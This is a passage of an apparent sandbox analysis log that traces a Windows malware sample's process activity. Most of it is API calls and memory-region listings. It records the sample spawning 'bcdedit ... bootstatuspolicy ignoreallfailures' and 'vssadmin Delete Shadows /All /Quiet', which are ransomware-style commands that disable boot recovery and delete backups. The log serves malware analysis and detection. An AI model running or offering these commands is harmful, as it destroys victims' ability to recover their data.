samDesired=0x20019, phkResult=0x41f9d4 | out: phkResult=0x41f9d4*=0x0) returned 0x2 [0022.178] VirtualQuery (in: lpAddress=0x41fa0b, lpBuffer=0x41f9a4, dwLength=0x1c | out: lpBuffer=0x41f9a4*(BaseAddress=0x41f000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.178] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x41f9a4, dwLength=0x1c | out: lpBuffer=0x41f9a4*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0022.178] VirtualQuery (in: lpAddress=0x321000, lpBuffer=0x41f9a4, dwLength=0x1c | out: lpBuffer=0x41f9a4*(BaseAddress=0x321000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0022.178] VirtualQuery (in: lpAddress=0x323000, lpBuffer=0x41f9a4, dwLength=0x1c | out: lpBuffer=0x41f9a4*(BaseAddress=0x323000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.178] VirtualQuery (in: lpAddress=0x420000, lpBuffer=0x41f9a4, dwLength=0x1c | out: lpBuffer=0x41f9a4*(BaseAddress=0x420000, AllocationBase=0x420000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0022.179] GetConsoleOutputCP () returned 0x1b5 [0022.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.179] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0022.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.179] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0022.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.179] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0022.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.179] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.180] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0022.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.180] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0022.180] GetEnvironmentStringsW () returned 0x7f20a0* [0022.180] FreeEnvironmentStringsW (penv=0x7f20a0) returned 1 [0022.180] GetEnvironmentStringsW () returned 0x7f20a0* [0022.181] FreeEnvironmentStringsW (penv=0x7f20a0) returned 1 [0022.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41e944 | out: phkResult=0x41e944*=0x68) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x0, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x1, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x1, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x0, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x40, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x40, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x40, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegCloseKey (hKey=0x68) returned 0x0 [0022.181] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41e944 | out: phkResult=0x41e944*=0x68) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x40, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x1, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x1, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x0, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x9, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x4, lpData=0x41e950*=0x9, lpcbData=0x41e948*=0x4) returned 0x0 [0022.181] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41e94c, lpData=0x41e950, lpcbData=0x41e948*=0x1000 | out: lpType=0x41e94c*=0x0, lpData=0x41e950*=0x9, lpcbData=0x41e948*=0x1000) returned 0x2 [0022.181] RegCloseKey (hKey=0x68) returned 0x0 [0022.182] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db5 [0022.182] srand (_Seed=0x5a0b3db5) [0022.182] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0022.182] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0022.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.182] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7f20a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0022.182] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.182] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.182] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.182] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0022.182] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0022.182] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0022.182] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0022.182] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0022.182] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0022.182] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0022.182] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0022.182] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0022.182] GetEnvironmentStringsW () returned 0x7f22b8* [0022.183] FreeEnvironmentStringsW (penv=0x7f22b8) returned 1 [0022.183] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0022.183] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.183] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0022.183] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0022.183] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0022.183] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0022.183] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0022.183] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0022.183] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0022.183] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0022.183] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x41f710 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x41f710, lpFilePart=0x41f70c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x41f70c*="Desktop") returned 0x25 [0022.183] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.183] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x41f48c | out: lpFindFileData=0x41f48c) returned 0x7f1f20 [0022.183] FindClose (in: hFindFile=0x7f1f20 | out: hFindFile=0x7f1f20) returned 1 [0022.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x41f48c | out: lpFindFileData=0x41f48c) returned 0x7f1f20 [0022.183] FindClose (in: hFindFile=0x7f1f20 | out: hFindFile=0x7f1f20) returned 1 [0022.183] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0022.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x41f48c | out: lpFindFileData=0x41f48c) returned 0x7f1f20 [0022.184] FindClose (in: hFindFile=0x7f1f20 | out: hFindFile=0x7f1f20) returned 1 [0022.184] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.184] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0022.184] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0022.184] GetEnvironmentStringsW () returned 0x7f4128* [0022.184] FreeEnvironmentStringsW (penv=0x7f4128) returned 1 [0022.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.184] GetConsoleOutputCP () returned 0x1b5 [0022.184] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.184] GetUserDefaultLCID () returned 0x409 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x41f850, cchData=128 | out: lpLCData="0") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x41f850, cchData=128 | out: lpLCData="0") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x41f850, cchData=128 | out: lpLCData="1") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0022.185] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0022.186] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0022.187] GetConsoleTitleW (in: lpConsoleTitle=0x7f2e80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.187] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.187] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0022.187] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0022.187] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0022.187] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0022.188] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0022.188] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0022.188] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0022.188] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0022.188] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0022.188] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0022.189] GetConsoleTitleW (in: lpConsoleTitle=0x41f548, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.189] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0022.189] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0022.189] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0022.189] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0022.189] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0022.189] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0022.189] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0022.189] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0022.189] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0022.189] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0022.189] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0022.189] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0022.189] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0022.189] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0022.189] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0022.189] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0022.189] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0022.189] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0022.189] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0022.189] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0022.189] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0022.189] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0022.189] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0022.190] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0022.190] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0022.190] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0022.190] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0022.190] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0022.190] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0022.190] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0022.190] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0022.190] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0022.190] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0022.190] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0022.190] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0022.190] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0022.190] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0022.190] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0022.190] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0022.190] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0022.190] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0022.190] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0022.190] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0022.190] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0022.190] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0022.190] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0022.190] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0022.190] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0022.190] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0022.190] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0022.190] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0022.190] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0022.190] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0022.190] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0022.190] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0022.190] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0022.190] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0022.191] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0022.191] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0022.191] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0022.191] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0022.191] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0022.191] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0022.191] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0022.191] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0022.191] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0022.191] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0022.191] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0022.191] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0022.191] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0022.191] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0022.191] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0022.191] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0022.191] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0022.191] SetErrorMode (uMode=0x0) returned 0x0 [0022.191] SetErrorMode (uMode=0x1) returned 0x0 [0022.191] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7e07f8, lpFilePart=0x41f068 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x41f068*="Desktop") returned 0x25 [0022.191] SetErrorMode (uMode=0x0) returned 0x1 [0022.192] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.192] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0022.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.201] _get_osfhandle (_FileHandle=2) returned 0xb [0022.201] GetFileType (hFile=0xb) returned 0x2 [0022.201] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0022.201] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x41f238 | out: lpMode=0x41f238) returned 1 [0022.201] _get_osfhandle (_FileHandle=2) returned 0xb [0022.202] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x41f26c | out: lpConsoleScreenBufferInfo=0x41f26c) returned 1 [0022.202] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a544640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0022.202] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a544640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x41f290, lpReserved=0x0 | out: lpBuffer=0x4a544640*, lpNumberOfCharsWritten=0x41f290*=0x62) returned 1 [0022.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.203] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.203] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0022.203] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.203] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0022.203] SetConsoleInputExeNameW () returned 0x1 [0022.203] GetConsoleOutputCP () returned 0x1b5 [0022.203] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.203] SetThreadUILanguage (LangId=0x0) returned 0x409 [0022.204] exit (_Code=1) Process: id = "19" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x64115000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xaec" cmd_line = "vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1206 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1207 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1208 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1209 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1210 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1211 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1212 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1213 start_va = 0x380000 end_va = 0x39efff entry_point = 0x380000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe") Region: id = 1214 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1215 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1216 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1217 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1218 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1219 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = 